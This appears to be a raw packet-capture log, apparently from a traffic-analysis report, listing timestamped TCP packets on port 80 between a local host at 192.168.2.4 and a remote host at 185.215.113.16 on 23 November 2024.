                                                                                                                                                                                                Nov 23, 2024 16:53:30.150603056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.150788069 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.150834084 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.151693106 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.151767015 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.151813030 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.152594090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.152707100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.152754068 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.153646946 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.153764963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.153810978 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.154769897 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.154861927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.154913902 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.155782938 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.155903101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.155961037 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.156846046 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.156981945 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.157030106 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.157890081 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.157973051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.158025980 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.158999920 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.159122944 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.159182072 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.160072088 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.160186052 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.160233974 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.161108971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.161160946 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.161237001 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.162127018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.162252903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.162298918 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.163183928 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.163268089 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.163321972 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.164292097 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.164400101 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.164447069 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.164717913 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.165307999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.165432930 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.165477037 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.166364908 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.166515112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.166565895 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.167964935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.168000937 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.168051958 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.168490887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.168595076 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.168644905 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.169526100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.169671059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.169734001 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.173862934 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.173897982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.173952103 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.174001932 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.174035072 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.174069881 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.174091101 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.174170971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.174217939 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.175076008 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.175246000 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.175297976 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.176163912 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.191318989 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.330420971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.330550909 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.330601931 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.330872059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.330960035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.331001997 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.331882954 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.332254887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.332307100 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.332380056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.333336115 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.333383083 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.333422899 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.334420919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.334470987 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.334542036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.335608006 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.335656881 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.335750103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.336556911 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.336601973 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.336664915 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.337596893 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.337642908 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.337789059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.338675022 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.338710070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.338733912 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.339700937 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.339757919 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.339876890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.340847015 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.340894938 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.340897083 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.341794014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.341841936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.341850042 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.342958927 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.343040943 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.343095064 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.343903065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.343952894 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.343997002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.344980001 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.345030069 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.345077991 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.346040964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.346075058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.346127033 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.347127914 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.347182989 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.347244024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.348172903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.348231077 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.348279953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.349211931 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.349256992 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.349306107 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.350251913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.350306034 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.350342035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.351392031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.351445913 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.351478100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.352355003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.352402925 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.352452040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.353426933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.353494883 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.353544950 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.354515076 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.354568005 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.354666948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.355534077 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.355588913 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.355633974 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.356592894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.356647968 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.356697083 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.357639074 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.357696056 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.357743979 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.358722925 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.358778000 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.358827114 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.359755039 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.359802961 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.359852076 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.360812902 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.360860109 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.360867023 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.361958981 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.361994982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.362020016 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.362549067 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.362960100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.363012075 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.363111973 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.364021063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.364068031 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.364115953 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.365037918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.365083933 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.365134954 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.366110086 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.366168022 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.366259098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.367157936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.367208958 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.367254019 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.368213892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.368266106 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.368324995 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.369261980 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.369311094 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.369349957 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.370316982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.370368958 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.370393038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.371392012 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.371439934 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.371440887 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.372484922 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.372519970 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.372535944 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.373490095 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.373542070 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.373589993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.374562025 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.374620914 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.374639988 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.375598907 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.375652075 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.375708103 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.376657963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.376715899 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.376748085 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.377693892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.377742052 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.377798080 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.378794909 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.378844976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.378871918 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.379002094 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.379816055 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.379867077 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.379887104 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.380866051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.380912066 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.380996943 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.381968975 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.382003069 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.382029057 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.383022070 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.383064985 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.383080959 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.384099007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.384161949 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.384208918 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.385138035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.385171890 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.385202885 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.395972967 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.457586050 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.541152954 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.541265011 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.541318893 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.541625977 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.541774035 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.541829109 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.542706966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.542817116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.542871952 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.543709040 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.543827057 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.543869019 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.544908047 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.544943094 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.545006037 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.545819998 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.545970917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.546019077 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.546878099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.546966076 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.547044992 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.547931910 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.548052073 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.548183918 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.548964024 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.549109936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.549159050 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.550065041 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.550189018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.550246954 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.551076889 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.551183939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.551254988 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.552158117 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.552268028 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.552324057 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.553175926 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.553272963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.553330898 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.554184914 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.554342031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.554409027 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.555260897 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.555330038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.555408955 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.556281090 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.556333065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.556380987 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.557323933 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.557425976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                Nov 23, 2024 16:53:30.557471991 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                Nov 23, 2024 16:53:30.558438063 CET8049744185.215.113.16192.168.2.4
